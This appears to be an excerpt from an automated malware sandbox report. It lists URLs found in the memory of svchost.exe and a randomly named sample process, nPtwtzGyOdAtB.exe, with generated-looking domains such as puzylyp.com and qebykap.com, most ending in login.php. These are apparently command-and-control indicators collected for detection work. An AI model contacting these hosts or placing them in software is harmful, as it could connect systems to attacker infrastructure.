Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyxil.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://puvyxil.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygop.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyguv.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/H
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjoq.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675053991.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677637599.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683007662.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683902342.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677712725.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681955715.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjov.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylol.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F20000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymev.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymig.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930331574.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypav.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624452735.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywuq.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669257529.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfav.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfup.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhag.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykap.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649417555.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykul.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1733345122.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylug.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyniv.com/login.php
